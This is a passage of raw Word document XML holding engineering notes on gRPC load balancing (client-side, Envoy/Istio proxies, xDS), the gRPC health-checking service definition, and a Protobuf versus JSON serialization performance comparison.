    </w:p>
    <w:p w14:paraId="1580D387" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">         "dns:///grpc.example.com:443",  // dns:/// resolver watches DNS for changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FAA47" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         grpc.WithDefaultServiceConfig(`{"loadBalancingConfig": [{"round_robin":{}}]}`),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47741D2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8FB703" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CD75D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Client-side LB requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EEC7E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Client knows all backend IPs (service discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48137238" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Client updates list as backends come/go (watch DNS or service registry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D119D05" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C19805" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. Proxy-based L7 load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1AB10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Envoy / Traefik / NGINX as L7 proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C8E4E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C2C2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Client → Envoy (on localhost) → Backend pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A71B54" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Envoy: terminates HTTP/2 connection, makes new connection per backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD037B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F624EB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC-aware: understands gRPC framing, routes per-RPC (not per-connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF3497A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69569BC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Service mesh (Istio + Envoy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2B539" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Sidecar Envoy on each pod: intercepts all traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F31B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Client pod → client sidecar → server sidecar → server pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1E894" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F746615" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Service discovery: Istio control plane (Pilot) pushes endpoint updates to Envoy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D1830" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Load balancing: round-robin, least-request, consistent hash (per Envoy config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1593C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2DE75" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. xDS API (Envoy's control plane protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD0BF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC supports xDS natively (xDS-based gRPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFE36E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4ECB9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   xDS resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA2F21" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     Listener: what to listen on (port, protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181EC820" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Route Configuration: URL → cluster mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF043DF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Cluster: group of backends with LB policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68B074" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Endpoint: specific backend instances in a cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E464874" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09565CCA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC xDS client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51327245" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Connects to xDS management server (Istio/Traffic Director/Envoy control plane)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756A672" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Receives Cluster + Endpoint updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C3409" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Performs client-side LB using xDS-provided configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA52832" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03C16E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14208CCE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     No proxy overhead (direct gRPC connection client → server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6676B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Centralized configuration (no per-client config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A50A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Dynamic updates (backends added/removed → xDS pushes updates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24742BBF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Traffic policies: health checking, outlier detection, circuit breaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BF1083" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="17E92811" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Health checking for load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2C9AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC Health Checking Protocol (standard):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EFBFD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.health.v1.Health service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9FC50B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F570F56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    service Health {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F43601" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      rpc Check(HealthCheckRequest) returns (HealthCheckResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C87D15" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      rpc Watch(HealthCheckRequest) returns (stream HealthCheckResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E737BBA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E5407" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA78FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    message HealthCheckResponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42908A34" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      enum ServingStatus {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12D63E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        UNKNOWN = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B1CAD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        SERVING = 1;     // healthy, ready to serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF4412" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        NOT_SERVING = 2; // unhealthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A30F39" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        SERVICE_UNKNOWN = 3; // no service by that name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748BEFBF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37795DE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      ServingStatus status = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614804C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8AB67C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3387627A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Watch: streaming health check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD9BB55" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Load balancer subscribes to Watch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF4A3FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Server sends update when health status changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36440158" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    LB removes unhealthy backends immediately (not waiting for next poll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F45E0A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="2EEA9934">
          <v:rect id="_x0000_i6619" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC89400" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Protobuf vs JSON — The Serialization Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2B331" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance Benchmarks and Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47014DEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18171886" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Serialization performance (typical results, varies by message structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49149296" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="35487064" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Message: Order with 5 items, strings, numbers, nested messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C7562" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>JSON size:    ~1.2KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74000E42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Protobuf size: ~350 bytes  (71% smaller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FFC21" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="68E84518" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Serialization speed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AF9205" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON (Go encoding/json):        ~800 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37819DA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON (Go json-iterator/go):     ~1,200 MB/s (faster JSON library)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A400E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Protobuf (Go google/protobuf):  ~2,500 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7FC88" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf (Go vtprotobuf):       ~6,000 MB/s (generated, no reflection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F9DA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C04C55" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: 3-8× faster serialization than JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D0B75" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED5249" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Deserialization speed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A78A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON:      ~600 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0072CEF3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf:  ~2,000 MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79E990" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13021661" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: 3-4× faster deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522136BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3DF701" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Memory allocation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739D55A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON: many small allocations (parse into map[string]interface{} or struct)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BABE6E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: generated code with known types → fewer allocations → less GC pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0728488C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73DA62" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>At 100K RPS, 1KB average message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DABEF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON serialization: 100K × 1KB / 800 MB/s = 0.125s CPU/second (12.5% of one core)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809AA7D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf serial.: 100K × 350B / 2500 MB/s = 0.014s CPU/second (1.4% of one core)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE863B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D052FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
